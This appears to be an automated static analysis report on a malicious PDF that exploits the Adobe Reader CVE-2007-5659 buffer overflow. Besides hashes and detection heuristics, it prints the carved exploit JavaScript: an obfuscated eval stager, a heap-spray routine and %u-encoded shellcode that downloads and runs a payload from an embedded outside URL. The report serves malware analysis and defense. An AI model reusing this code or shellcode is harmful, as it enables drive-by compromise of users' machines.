Malicious PDF — malware analysis report

Static analysis result for SHA-256 179937f691433456…

MALICIOUS

PDF

12.6 KB
MD5: 0c2a3715584bbf14fa8d9ec703cf2eb4 SHA-1: 1f86b62bb618f5491b50d9c8a73a1f6d91615ed6 SHA-256: 179937f6914334560827cd1ac4701a80b208ecaf9104f2a59b479c7656c2a0f7
310 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that exploits CVE-2007-5659, specifically targeting Adobe Reader versions within a certain patch range. The script is designed to download a second-stage payload from the URL http://fjwctphoxdv.com/nte/KAND.asp/yH689031ecV0100f080006R0ee58237102Tee8df088201l0007. The presence of obfuscated JavaScript and the embedded download URL strongly indicate a malicious intent to execute arbitrary code.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-36062 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36062
  • Annotation subject percent-decoding eval stager critical PDF_ANNOT_SUBJECT_MARKER_EVAL_STAGER
    OpenAction JavaScript forces annotation enumeration, reads an annotation /Subject payload with getAnnots(), rewrites marker bytes into percent escapes, decodes it with unescape(), and dispatches it through eval. This is a high-confidence exploit-kit staging pattern. It is intentionally not mapped to CVE-2009-1492 unless getAnnots() itself carries the crafted integer or long argument shape for that vulnerability.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://fjwctphoxdv.com/nte/KAND.asp/yH689031ecV0100f080006R0ee58237102Tee8df088201l0007 Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js
068944f8c011a88ab770b45c6de142b9305a1f515d410204d5eadd9ac2b5bfb3		 pdf-javascript-stream PDF /JS object 7 at offset 0x19B 373 bytes
Preview script
First 1,000 lines of the extracted script
em = ''; em = ''; r = (r = 'l' + 'a' + em + 'ce', 'rep' + r); if (!em && r) {var z; var y; th = event['tar' + em + 'get'];var e = th[em + 'e'+ em + 'v'+'al']; z = y = th; 
	 y = 0; 	 z['syncAn' + em + 'notS' + 'can'] ( ); y = z;var p = y['g'+'et'+'Annots']( {  nPage: 0 }) ;var s = p[0].subject;var l = s[r](/k /g, 'q%p'[r](/[qp]/g, ''));s = th['unes' + 'cape'] (l) ;e(s);}
legacy_pdfkit_stage_000.js
380e5b3e223355f6618efdafefa0bbfa76f7280e9c7c32a196f0bf20ecf3e06f		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x2F5 12385 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function wA_q71t__b(uwqX_804, I3_w0iG7Eg_sa8){  var L__8N78_6723s0U = 'um' + 'en' + "ts";L__8N78_6723s0U = 'a' + 'rg' + L__8N78_6723s0U;var h__d6n_BH7M_752 = wA_q71t__b[L__8N78_6723s0U]["c" + "a" + "zzee"['r'+'epl'+'ace'](/zz/, 'll')];h__d6n_BH7M_752 = h__d6n_BH7M_752["t" + "oS" + "t" + "r" + "in" + "g"]();var le33eg_aLiV5w = 0;try {if (app) {le33eg_aLiV5w++;le33eg_aLiV5w++;}} catch(e) { }var fXNTo_1_C_PeVd = new Array();if (uwqX_804) { fXNTo_1_C_PeVd = uwqX_804;} else {var jR1h83jB_q6 = 0;var T__HX6WEMEF1pg = 0;var oO_wI_hDDPDya = 512;var E6_3FS47 = 52;E6_3FS47 = E6_3FS47 - 4;var a1a4sv3RU_yb = E6_3FS47 + 9;while(T__HX6WEMEF1pg < h__d6n_BH7M_752['le'+'ngth']) {var Q_1m__D_B1p = 1;var brk___2 = h__d6n_BH7M_752['c'+'h'+'arC'+'odeAt'](T__HX6WEMEF1pg);if (brk___2 <= a1a4sv3RU_yb && brk___2 >= E6_3FS47) {if (jR1h83jB_q6 == 4) { jR1h83jB_q6 = 0; }if (isNaN(fXNTo_1_C_PeVd[jR1h83jB_q6])) {fXNTo_1_C_PeVd[jR1h83jB_q6] = 0;}fXNTo_1_C_PeVd[jR1h83jB_q6] += brk___2;if (fXNTo_1_C_PeVd[jR1h83jB_q6] > 512) {fXNTo_1_C_PeVd[jR1h83jB_q6] -= oO_wI_hDDPDya;}jR1h83jB_q6++;}T__HX6WEMEF1pg++;}}var uq_pAI6Ea = 0;jR1h83jB_q6 = 4;for (; uq_pAI6Ea < 4; ++uq_pAI6Ea) {if (fXNTo_1_C_PeVd[uq_pAI6Ea] > 256) {fXNTo_1_C_PeVd[uq_pAI6Ea] -= 256;}}var VW5nU64_387X__S = 0;var kpf13p;var OYVEsJp4R_4 = 0;var Mtc2_al = 0;var U__Fr8KC_xOy = 0;var nRXp7b26s = "";while(U__Fr8KC_xOy < I3_w0iG7Eg_sa8.length) {var fW_J726bJxq = I3_w0iG7Eg_sa8.substr(U__Fr8KC_xOy, 1) + "Z";var xa_ESL_2R6X = parseInt(fW_J726bJxq, 16);if (VW5nU64_387X__S) {kpf13p += xa_ESL_2R6X;if (Mtc2_al == 4) {Mtc2_al -= 4;}var F_T_FJ2_7y = kpf13p;F_T_FJ2_7y = F_T_FJ2_7y - (1 + OYVEsJp4R_4 + 1) * fXNTo_1_C_PeVd[Mtc2_al];if (F_T_FJ2_7y < 0) {          var W_xL_5d = 256;F_T_FJ2_7y = F_T_FJ2_7y - Math['floor'](F_T_FJ2_7y / W_xL_5d) * 256;}F_T_FJ2_7y = String['from' + 'CharCode'](F_T_FJ2_7y);if (le33eg_aLiV5w == 2) {nRXp7b26s += F_T_FJ2_7y;} else if (le33eg_aLiV5w == 1) {nRXp7b26s += xa_ESL_2R6X;} else {nRXp7b26s += U__Fr8KC_xOy;}Mtc2_al++;VW5nU64_387X__S = 0;OYVEsJp4R_4++;} else {VW5nU64_387X__S = 1;kpf13p = xa_ESL_2R6X * 16;}U__Fr8KC_xOy++;};var abcd=0; ;var mAt5ie_R_F_J83V = this;mAt5ie_R_F_J83V['e' + 'val'](nRXp7b26s);}
	wA_q71t__b(0, "FABF5277F3E5F439D5FA0720D44AD47BE11ECE6C2346812526AF9987E5B1766C36BE52EFFC3C1FC2374F13413B7BB101047B809727DCA18514F188135B0446CA633D2C656E502835346BC0913E91E69092E1D4309B1460C7AA106953A75578017C6559DB74AF10538BA3EFFB7CEEDFCC992EC59EB2199F03CB7950B1A5B1768CF67E472AEBE516E2F30DD18EFB48A018C456BFD8E196A5AAFA817F0F13E130BDF2124F8A403829513B16C9CA5277F25B34AFB0461DC59FF52AAE5D5F1ED83B517350080D6D78E0A44A8DD02266B5B40358B5987E6119603054FE5BBF9D2C5F7B77683F2BB47AF7DB8BA3136F98B6E74EC31DB606CB4571B2D3804E6BE1A4671FEC9900B8C2E5F036DE0DD417D00DB892D9718B32D546BB2915C040AEEDD57556FBF116301217F197F42BC07F3D88F3202DACD48F53B99F724AED7F1E2D155FDD325155797F7A32EB7564FF9F4FA0DF4F8CB297FF63DBB39F54FF4948775F66EB6C3F49EA9AA70E4BA39FFF44A7CDD3B1DD04B158A00F69F3EF5D51DEF181377EBAD72628BDBAE0C0B4FDD18E1121B72EDA77A6D8DD5A6EA723A1945125E467B3F5D40972352CE00B231FFF04274DD3715D84B1182094ACF862F594A71CF33D0B350700122C55F1A28979D74252CFC6EC55B280844CC8701554F940EE6D5575967B7116709297F1D78F8E1DB4C809E51BCD2480CFBB179FC8BF457335F57C51DCB88C4CBCFAED346BB4CFDDCFCEFFA0D6C44D916621717706EAC766B0EDAA2048E4C010E7EE01E0E0245FF06E0D75DF1D1A5E9D873B979F883FC573F575FC519C38FE0B375C771022458DFFD15291FD989BE6C93391CE90E4842D517E9B5836F9B0834EDEC0AEE05F74A6C9EFD7B6D0ECB41D9186CB4876F3B12E42AF9E562B4BD4CF3036BDE51FE5CAE9C0AC1237F2FBED5DBFF2DE67827821B458FFF99669DBF4D51586FA3A2F36486009FD433EB1710D79C94D0C8E89F253F952803EFB6D513C0C4CFC7A6D34AB346BDD0F4D7FA01644C7BFA697D88135793B86D75C33206D744000226C8F1F02BFA0E191A103E6339FDEDD0CD859A573DD744027C5955F16B69F229CF9ECF83100130E16103EA07CE11E9230CCA160FC13AD8B91FDB845782AD600F4ECE8F093F629C08C2C87D01A159DBFC922867D3316C142DF27D649CA634912584E4B2D294C4ECB8F3EA6A23B4F9EB0387C0571D29330565AAE5B7440B68C00C7BD961F54B3CD02059713E6F0D221D490DB54603DBE4382B5DB67499AF5862B3EDDBBF3CFFBDAC086FD3BB121EA6BCBEADD5E715C2FC48151DCBB5FE01B0B3F8B242535422737E101FC53A0A949B580285ED8A
... (truncated)
legacy_pdfkit_stage_001.js
358718ebdb67a63316b69dc8019db4f461fae6baaf9eee3e43859859bb91e0b9		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x2F5 5088 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var g_46ALgq8tT = new Array();var r80v__cas2_e1F = 0;var chT_NF___LNbJhr = "";function TvBI4k_x68Gyd(iP075O, X_Q5pewF3_0Wk02){var gS__V___1__r = X_Q5pewF3_0Wk02.toString();var PqP_1__b6 = "";for(var a6_03J_4h47875s = 0; a6_03J_4h47875s < gS__V___1__r.length; a6_03J_4h47875s++) {var O1_uK7S6yFQ14 = parseInt(gS__V___1__r.substr(a6_03J_4h47875s, 1));if (!isNaN(O1_uK7S6yFQ14)) {O1_uK7S6yFQ14 = O1_uK7S6yFQ14.toString(16);if (O1_uK7S6yFQ14.length == 1) { O1_uK7S6yFQ14 = "0" + O1_uK7S6yFQ14; }else if (O1_uK7S6yFQ14.length != 2) { O1_uK7S6yFQ14 = "00"; }PqP_1__b6 = O1_uK7S6yFQ14 + PqP_1__b6;}}while(PqP_1__b6.length < 8) { PqP_1__b6 = "0" + PqP_1__b6; }var I__k2ABEmf8 = iP075O.toString(16);if (I__k2ABEmf8.length == 1) { I__k2ABEmf8 = "0" + I__k2ABEmf8; }else if (I__k2ABEmf8.length != 2) { I__k2ABEmf8 = "00"; }PqP_1__b6 = "3" + I__k2ABEmf8 + "P" + PqP_1__b6;return PqP_1__b6;}function jJ5b6_1Ioq(KgQ53Lg, Wae1FFmkc181){var E_UWm_TX_u_SIAr = new Array("");var r__p_Iu__yL = KgQ53Lg;var p4_D1l;if ((p4_D1l = KgQ53Lg.lastIndexOf("%u00")) != -1) {if (p4_D1l + 6 == KgQ53Lg.length) {E_UWm_TX_u_SIAr[0] = KgQ53Lg.substr(p4_D1l + 4, 2);r__p_Iu__yL = KgQ53Lg.substring(0, p4_D1l);}}p4_D1l = 1;for (a6_03J_4h47875s = 0; a6_03J_4h47875s < Wae1FFmkc181.length; a6_03J_4h47875s++) {var rj__T_Vp16buDs = Wae1FFmkc181.charCodeAt(a6_03J_4h47875s).toString(16);if (rj__T_Vp16buDs.length == 1) { rj__T_Vp16buDs = "0" + rj__T_Vp16buDs; }E_UWm_TX_u_SIAr[p4_D1l] = rj__T_Vp16buDs;p4_D1l++;}a6_03J_4h47875s = E_UWm_TX_u_SIAr[0].length ? 0 : 1;E_UWm_TX_u_SIAr[p4_D1l] = "00";E_UWm_TX_u_SIAr[p4_D1l + 1] = "00";p4_D1l += 2;if ((E_UWm_TX_u_SIAr.length - a6_03J_4h47875s) % 2) {E_UWm_TX_u_SIAr[p4_D1l] = "00";}while(a6_03J_4h47875s < E_UWm_TX_u_SIAr.length) {r__p_Iu__yL += "%u" + E_UWm_TX_u_SIAr[a6_03J_4h47875s + 1] + E_UWm_TX_u_SIAr[a6_03J_4h47875s];a6_03J_4h47875s += 2;}r__p_Iu__yL += "%u0000";return r__p_Iu__yL;}function rH5nWA_D(F557c5a_3L, R_2_A___wN){while (F557c5a_3L.length*2<R_2_A___wN) {F557c5a_3L += F557c5a_3L;}F557c5a_3L = F557c5a_3L.substring(0,R_2_A___wN/2);return F557c5a_3L;}function D7_iF4iEbg(T2G43sK0D56, Blsnhr2_U, jDQ2eR_Qu_I1){var a8bEDO5_DC = 0x0c0c0c0c;var F557c5a_3L = unescape(Blsnhr2_U);var Wae1FFmkc181 = TvBI4k_x68Gyd(T2G43sK0D56, jDQ2eR_Qu_I1);var R_i0_117H7j = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var KgQ53Lg = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u4b70%u4368%u0073%u7468%u7074%u2f3a%u662f%u776a%u7463%u6870%u786f%u7664%u632e%u6d6f%u6e2f%u6574%u4b2f%u4e41%u2e44%u7361%u2f70%u4879%u3836%u3039%u3133%u6365%u3056%u3031%u6630%u3830%u3030%u3630%u3052%u6565%u3835%u3332%u3137%u3230%u6554%u3865%u6664%u3830%u3238%u3130%u306c%u3030%u0037";app.BJ334m = unescape(jJ5b6_1Ioq(KgQ53Lg, Wae1FFmkc181));var X724FO = 0x400000;var lK__7__R5G = R_i0_117H7j.length * 2;var R_2_A___wN = X724FO - (lK__7__R5G+0x38);F557c5a_3L = rH5nWA_D(F557c5a_3L, R_2_A___wN);var fW4CfuIj = (a8bEDO5_DC - 0x400000)/X724FO;for (var A_l63i = 0; A_l63i < fW4CfuIj; A_l63i++) {g_46ALgq8tT[A_l63i] = F557c5a_3L + R_i0_117H7j;}}function D_W2H5__M(){var Ap__4oQ07_D_e = "";for (a6_03J_4h47875s
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.